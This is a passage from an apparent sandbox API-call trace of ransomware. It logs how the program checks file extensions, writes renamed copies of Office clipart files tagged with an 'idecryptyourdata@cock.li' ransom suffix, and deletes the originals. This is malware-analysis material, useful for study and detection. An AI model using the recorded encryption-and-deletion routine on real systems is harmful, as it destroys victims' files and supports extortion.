Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09662_.wmf")) returned 1 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.099] lstrlenW (lpString=".doc") returned 4 [0063.099] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString=".docx") returned 5 [0063.099] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.099] lstrlenW (lpString=".pdf") returned 4 [0063.099] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString=".xls") returned 4 [0063.099] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.099] lstrlenW (lpString=".xlsx") returned 5 [0063.099] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.099] lstrlenW (lpString=".ppt") returned 4 [0063.099] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.099] lstrlenW (lpString=".zip") returned 4 [0063.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.099] lstrlenW (lpString=".rar") returned 4 [0063.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString=".bz2") returned 4 [0063.099] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString=".7z") returned 3 [0063.099] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.099] lstrlenW (lpString=".dbf") returned 4 [0063.099] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.099] lstrlenW (lpString=".1cd") returned 4 [0063.099] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.099] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09662_.WMF") returned 68 [0063.100] lstrlenW (lpString=".jpg") returned 4 [0063.100] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.100] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.100] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.100] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.100] GetLastError () returned 0x0 [0063.100] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1f1e, lpOverlapped=0x0) returned 1 [0063.101] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1f20, lpOverlapped=0x0) returned 1 [0063.102] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.102] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.103] SetEndOfFile (hFile=0x344) returned 1 [0063.103] CloseHandle (hObject=0x344) returned 1 [0063.105] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.105] SetEndOfFile (hFile=0x368) returned 1 [0063.106] CloseHandle (hObject=0x368) returned 1 [0063.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.106] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd09664_.wmf")) returned 1 [0063.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.106] lstrlenW (lpString=".doc") returned 4 [0063.106] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.106] lstrlenW (lpString=".docx") returned 5 [0063.106] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.106] lstrlenW (lpString=".pdf") returned 4 [0063.106] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString=".xls") returned 4 [0063.107] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.107] lstrlenW (lpString=".xlsx") returned 5 [0063.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.107] lstrlenW (lpString=".ppt") returned 4 [0063.107] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.107] lstrlenW (lpString=".zip") returned 4 [0063.107] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.107] lstrlenW (lpString=".rar") returned 4 [0063.107] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString=".bz2") returned 4 [0063.107] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString=".7z") returned 3 [0063.107] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.107] lstrlenW (lpString=".dbf") returned 4 [0063.107] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.107] lstrlenW (lpString=".1cd") returned 4 [0063.107] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD09664_.WMF") returned 68 [0063.107] lstrlenW (lpString=".jpg") returned 4 [0063.107] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.108] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.108] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.108] GetLastError () returned 0x0 [0063.108] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x34cb, lpOverlapped=0x0) returned 1 [0063.115] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x34d0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x34d0, lpOverlapped=0x0) returned 1 [0063.115] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.116] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.116] SetEndOfFile (hFile=0x344) returned 1 [0063.116] CloseHandle (hObject=0x344) returned 1 [0063.117] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.117] SetEndOfFile (hFile=0x368) returned 1 [0063.118] CloseHandle (hObject=0x368) returned 1 [0063.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10890_.gif")) returned 1 [0063.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.118] lstrlenW (lpString=".doc") returned 4 [0063.118] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.118] lstrlenW (lpString=".docx") returned 5 [0063.118] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.118] lstrlenW (lpString=".pdf") returned 4 [0063.118] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.119] lstrlenW (lpString=".xls") returned 4 [0063.119] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.119] lstrlenW (lpString=".xlsx") returned 5 [0063.119] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.119] lstrlenW (lpString=".ppt") returned 4 [0063.119] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.119] lstrlenW (lpString=".zip") returned 4 [0063.119] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.119] lstrlenW (lpString=".rar") returned 4 [0063.119] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.119] lstrlenW (lpString=".bz2") returned 4 [0063.119] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.119] lstrlenW (lpString=".7z") returned 3 [0063.119] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.119] lstrlenW (lpString=".dbf") returned 4 [0063.119] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.119] lstrlenW (lpString=".1cd") returned 4 [0063.119] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10890_.GIF") returned 68 [0063.119] lstrlenW (lpString=".jpg") returned 4 [0063.119] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.119] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.120] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.121] GetLastError () returned 0x0 [0063.121] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x4edd, lpOverlapped=0x0) returned 1 [0063.478] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x4ee0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x4ee0, lpOverlapped=0x0) returned 1 [0063.479] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.479] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.479] SetEndOfFile (hFile=0x344) returned 1 [0063.479] CloseHandle (hObject=0x344) returned 1 [0063.480] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.480] SetEndOfFile (hFile=0x368) returned 1 [0063.481] CloseHandle (hObject=0x368) returned 1 [0063.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.481] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd10972_.gif")) returned 1 [0063.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.482] lstrlenW (lpString=".doc") returned 4 [0063.482] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0063.482] lstrlenW (lpString=".docx") returned 5 [0063.482] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0063.482] lstrlenW (lpString=".pdf") returned 4 [0063.482] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0063.482] lstrlenW (lpString=".xls") returned 4 [0063.482] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0063.482] lstrlenW (lpString=".xlsx") returned 5 [0063.482] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0063.482] lstrlenW (lpString=".ppt") returned 4 [0063.482] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0063.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.482] lstrlenW (lpString=".zip") returned 4 [0063.482] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0063.482] lstrlenW (lpString=".rar") returned 4 [0063.482] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0063.482] lstrlenW (lpString=".bz2") returned 4 [0063.482] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0063.482] lstrlenW (lpString=".7z") returned 3 [0063.483] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0063.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.483] lstrlenW (lpString=".dbf") returned 4 [0063.483] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0063.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.483] lstrlenW (lpString=".1cd") returned 4 [0063.483] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0063.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD10972_.GIF") returned 68 [0063.483] lstrlenW (lpString=".jpg") returned 4 [0063.483] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0063.483] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.483] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.483] GetLastError () returned 0x0 [0063.483] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x30e8, lpOverlapped=0x0) returned 1 [0063.485] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x30f0, lpOverlapped=0x0) returned 1 [0063.486] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.486] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.486] SetEndOfFile (hFile=0x344) returned 1 [0063.486] CloseHandle (hObject=0x344) returned 1 [0063.487] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.487] SetEndOfFile (hFile=0x368) returned 1 [0063.488] CloseHandle (hObject=0x368) returned 1 [0063.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00008_.wmf")) returned 1 [0063.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.488] lstrlenW (lpString=".doc") returned 4 [0063.488] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.488] lstrlenW (lpString=".docx") returned 5 [0063.488] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.488] lstrlenW (lpString=".pdf") returned 4 [0063.489] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString=".xls") returned 4 [0063.489] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.489] lstrlenW (lpString=".xlsx") returned 5 [0063.489] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.489] lstrlenW (lpString=".ppt") returned 4 [0063.489] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.489] lstrlenW (lpString=".zip") returned 4 [0063.489] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.489] lstrlenW (lpString=".rar") returned 4 [0063.489] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString=".bz2") returned 4 [0063.489] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString=".7z") returned 3 [0063.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.489] lstrlenW (lpString=".dbf") returned 4 [0063.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.489] lstrlenW (lpString=".1cd") returned 4 [0063.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00008_.WMF") returned 68 [0063.489] lstrlenW (lpString=".jpg") returned 4 [0063.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.490] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.490] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.490] GetLastError () returned 0x0 [0063.490] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x265a, lpOverlapped=0x0) returned 1 [0063.519] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x2660, lpOverlapped=0x0) returned 1 [0063.520] ReadFile (in: hFile=0x368, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0063.520] WriteFile (in: hFile=0x344, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xec, lpOverlapped=0x0) returned 1 [0063.521] SetEndOfFile (hFile=0x344) returned 1 [0063.521] CloseHandle (hObject=0x344) returned 1 [0063.522] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0063.522] SetEndOfFile (hFile=0x368) returned 1 [0063.523] CloseHandle (hObject=0x368) returned 1 [0063.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.523] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00012_.wmf")) returned 1 [0063.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.523] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.523] lstrlenW (lpString=".doc") returned 4 [0063.523] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.523] lstrlenW (lpString=".docx") returned 5 [0063.523] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.523] lstrlenW (lpString=".pdf") returned 4 [0063.523] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.523] lstrlenW (lpString=".xls") returned 4 [0063.524] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.524] lstrlenW (lpString=".xlsx") returned 5 [0063.524] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.524] lstrlenW (lpString=".ppt") returned 4 [0063.524] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.524] lstrlenW (lpString=".zip") returned 4 [0063.524] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.524] lstrlenW (lpString=".rar") returned 4 [0063.524] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.524] lstrlenW (lpString=".bz2") returned 4 [0063.524] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.524] lstrlenW (lpString=".7z") returned 3 [0063.524] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.524] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00012_.WMF") returned 68 [0063.524] lstrlenW (lpString=".dbf") returned 4 [0063.524] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") 